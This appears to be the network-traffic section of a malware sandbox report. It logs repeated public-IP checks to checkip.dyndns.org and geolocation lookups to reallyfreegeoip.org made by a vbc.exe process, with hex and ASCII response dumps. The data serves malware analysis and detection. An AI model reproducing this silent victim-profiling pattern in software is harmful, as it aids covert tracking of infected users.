                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:52.118431091 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.849748132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:52.523053885 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:53.354266882 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.849714104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:40 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:40 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084729
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7weWkLJP06Bq4bzDHoP%2FmeUacz7j%2B9vp7Ocj%2BYw%2B5AKygK8ro1BqldixOpcGOO61ShUGMUSiTax3wKvEz9R1FTiyZvvIBTMS6rNSLJi2W7CE4hNDh5%2BkCfhGQeXSy8nGZ0grksL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015417fde2f0f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1680&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=221&unsent_bytes=0&cid=32c350478485a687&ts=182&x=0"
                                                                                                                                            2025-01-13 12:05:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.849715104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:42 UTC855INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084731
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmsHv2Xxw8GcWbPWtsmBtKr1qNLjmTe6DIcJhEoX8ZZZD9Bd9MMrDDP%2FoCNgKd%2Fsz5sUEFtCZBwHppdqYsS5Rj5JY72rAkV%2F9YqntjHdJ9ziBSgWNsbiMNPQWCkKc1xV6HFzKSUf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015418bf926424b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1565&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1833019&cwnd=249&unsent_bytes=0&cid=f191e69be295a61c&ts=154&x=0"
                                                                                                                                            2025-01-13 12:05:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.849716104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:42 UTC855INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084731
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utYmhGTMU2pJEMFY4smKO0tALIEjKKyvTGM9UYuRFnFVqobJd%2BdLHqnxUrq5hDyysDnFIuQepIKcScAvm98562PD0eVdZL6jDEKyKxP4S6wa2pUigwb%2BqDlSDROcbgdJr%2F42wrYw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015418da9d00f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1740166&cwnd=221&unsent_bytes=0&cid=8768af2c1bf7aadb&ts=168&x=0"
                                                                                                                                            2025-01-13 12:05:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.849718104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:43 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:43 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084732
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R6bH%2BOSEr0w4Exi2F%2BZPwzI78RN5lD7q%2B4SVQp3S7gAEhgMwiaLqjPaD%2B5BJrfJB%2F1juaaLHhjNT108VCeCTtDbbvh5PQTNXVLPyrufPNRLVDeFyS6fWnhaiKiZMHJKqucOYHaqn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419358c043b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1573&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1826141&cwnd=203&unsent_bytes=0&cid=030903913a665b30&ts=152&x=0"
                                                                                                                                            2025-01-13 12:05:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.849719104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:43 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084732
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mhY6EQsPlGDSZvn47dprfpLnM5ZQnOpVZUT13ptxAEx6zlz%2FcIWNYUL%2FV%2Bz%2FWZ4d2sQfi%2FtCHaMrJoRNY5Inc0D4upjLuMnCh8RwRDevSulWeJ55EA0EXv6rsKewUquChmGbic8D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 90154194fc98727b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1912&rtt_var=730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1485249&cwnd=234&unsent_bytes=0&cid=1f0233576fc542a0&ts=139&x=0"
                                                                                                                                            2025-01-13 12:05:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.849722104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-13 12:05:45 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084734
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNoJUCQF3KXDcMJE42Nue8faW%2FNYcBPJizyICJVafSKZUQybBdqWEZuTK5%2FS2A%2F%2F79b2vS3b35OXRC4Ehc6pmfY6Arefkn9RZK2AZFnXX9bTDZz7VJQmW6Vzn7Sm8mBSPu%2FzCdcD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419c3e06424b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1510&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1828428&cwnd=249&unsent_bytes=0&cid=ecbebaf24b581312&ts=130&x=0"
                                                                                                                                            2025-01-13 12:05:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.849723104.21.112.14431532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:45 UTC856INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084734
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrUUb1xnSkyIXdcAfW0r6x1lqDtt1vdLoCttNR3zjEJH3VOsdzh3weFFQxz9qnVV%2B66%2BP%2B9qZwfXZAmTk5oabGr%2FK2Nk7hVidRISEsxI8upqrDJcS7F364S8ByUndKnv6W8e6niR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419e5acec34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1462&rtt_var=731&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=164999&cwnd=181&unsent_bytes=0&cid=242d49ee5ac9600a&ts=169&x=0"
                                                                                                                                            2025-01-13 12:05:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.849726104.21.112.14433760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-13 12:05:46 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-13 12:05:46 UTC854INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084735
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsCis0Hp3JbQOFyO0NAzYXU96vXuZwWEFKvjpwOKxvlfsLFSKDtINzkkg9Uw61ApPJp8OvxwjDx0eWP808pkAWS2TDfe%2BaKbc5ho9fHmXlZln5DyXC7%2FD1nO22EZEsNPiE8oKxvQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541a65f7c0f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6537&min_rtt=1530&rtt_var=3692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=221&unsent_bytes=0&cid=e88ec7ef5ac5bd5d&ts=139&x=0"
                                                                                                                                            2025-01-13 12:05:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
